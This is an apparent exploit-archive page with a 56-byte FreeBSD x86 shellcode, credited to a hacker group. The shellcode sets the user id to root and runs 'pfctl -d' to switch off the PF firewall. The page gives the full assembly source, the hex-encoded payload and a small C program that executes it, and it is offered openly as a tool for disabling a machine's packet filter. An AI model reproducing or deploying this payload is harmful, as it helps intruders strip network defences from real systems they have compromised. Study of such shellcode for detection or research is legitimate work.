56 bytes setreuid, execve(pfctl -d) shellcode for freebsd/x86.
9f0ec696e7b3ac3dcc7755ae7e73a249c3f2fb62e635e84b71bf5bfc525ee831 ***(C)oDed bY suN8Hclf***
DaRk-CodeRs Group production, kid
[FreeBSD x86 setreuid(0, 0) + execve(pfctl -d) 56 bytes]
The simples way to disable the FreeBSD's packet filter. We do not
flush all rules (pfctl -F all) but only turn the firewall off.
Assembly code:
-------------------------code.asm--------------------------
section .text
global _start
_start:
xor eax, eax
push eax
push eax
mov al, 126
push eax
int 0x80 ; setreuid()
xor eax, eax
push eax
push word 0x642d
mov ecx, esp ; ecx contains a pointer to "-d" string
push eax
push 0x6c746366
push 0x702f6e69
push 0x62732f2f
mov ebx, esp ; ebx contains a pointer to "//sbin/pfctl" string
push eax
push ecx
push ebx
mov ecx, esp
push eax
push ecx
push ebx
mov al, 0x3b
push eax
int 0x80 ; execve()
xor eax, eax
push eax
push eax
int 0x80 ; exit()
-------------------------code.asm--------------------------
And C code:
-------------------------code.c----------------------------
#include <stdio.h>
char shellcode[]=
"\x31\xc0\x50\x50\xb0\x7e\x50\xcd\x80\x31\xc0\x50\x66\x68\x2d\x64"
"\x89\xe1\x50\x68\x66\x63\x74\x6c\x68\x69\x6e\x2f\x70\x68\x2f\x2f"
"\x73\x62\x89\xe3\x50\x51\x53\x89\xe1\x50\x51\x53\xb0\x3b\x50\xcd"
"\x80\x31\xc0\x50\x50\xcd\x80";
int main(int argc, char *argv[]){
int (*func)();
func=(int (*)())shellcode;
(int)(*func)();
}
-------------------------code.c----------------------------
Greetz to: 0in, cOndemned (and to other DaRk-CodeRs members), str0ke, e.wiZz!,
Katharsis, doctor and many others...
Visit us : www.dark-coders.pl
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed